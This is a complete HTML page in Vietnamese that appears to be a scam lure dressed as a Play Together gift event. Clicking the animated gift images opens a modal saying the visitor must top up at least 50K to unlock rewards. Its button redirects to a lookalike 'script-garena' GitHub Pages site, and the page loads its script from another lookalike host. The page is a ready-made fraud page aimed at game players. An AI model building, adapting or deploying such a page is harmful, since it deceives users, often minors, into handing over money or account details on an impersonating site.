
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
    
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css"
    />
    <!-- Google Fonts Roboto -->
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&display=swap"
    />
    <!-- MDB -->
    <link rel="stylesheet" href="https://script-sc0m.github.io/css/mdb.min.css" />
    <style>
    body{
            background: url(https://i.ibb.co/tXnS7cP/6aad202327b04f5e9a8cf4f0379ee326.png);
            }
            
/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
  background-color: #fefefe;
  margin: auto;
  padding: 20px;
  border: 1px solid #888;
  width: 80%;
}

/* The Close Button */
.close {
  color: #aaaaaa;
  float: right;
  font-size: 28px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}
.napthe {
    display: block;
    font-size: 0px;
    background-image: url(https://i.ibb.co/41p8qYs/sprites-floating.png?32123213);
    background-position: -534px -226px;
    width: 190px;
    height: 69px;
}
    </style>
      <link
    rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"
  />
  </head>
  <body>
      <div id="myModal" class="modal">

  <!-- Modal content -->
  <div class="modal-content">
  
    <center>
          <p>Chúng tôi nhận thấy bạn chưa nạp lần đầu tại nap-the, hãy nạp ít nhất 50K để mở khoá toàn bộ phần thưởng đi kèm sự kiện</p>
        <div class="napthe" onclick="window.location.href='https://script-garena.github.io/chuyen-huong.html/1.html'"></div>
    </center>
  </div>

</div>
    <!-- Start your project here-->
    <div class="container">
        
    <div class="row justify-content-center">
        <div class="col-md-12 mt-3 mb-2">
            <img src="https://i.ibb.co/XxML9zg/vng-chinh-thuc-xac-nhan-phat-hanh-play-together-tai-viet-nam-6299c513a3048.png" class="w-100 rounded"/>
        </div>
        <div class="col-md-6">
            <img onclick="tb()" src="https://i.ibb.co/YN1YYQb/qua2.png" class="animate__animated animate__tada animate__infinite	infinite animate__slower rounded w-100"/>
        </div>
         <div class="col-md-6">
            <img onclick="tb()" src="https://i.ibb.co/mNjD0c4/qua3.png" class="animate__animated animate__tada animate__infinite	infinite animate__slower rounded w-100"/>
        </div>
         <div class="col-md-6">
            <img onclick="tb()" src="https://i.ibb.co/n0yDhVs/qua4.png" class="animate__animated animate__tada animate__infinite	infinite animate__slower rounded w-100"/>
        </div>
    </div>
    </div>
    <!-- End your project here-->

    <!-- MDB -->
    <script type="text/javascript" src="https://script-sc0m.github.io/js/mdb.min.js"></script>
    <!-- Custom scripts -->
    <script type="text/javascript">
    var modal = document.getElementById("myModal");

    function tb(){
        modal.style.display = "block";
    }
    </script>
  </body>
</html>
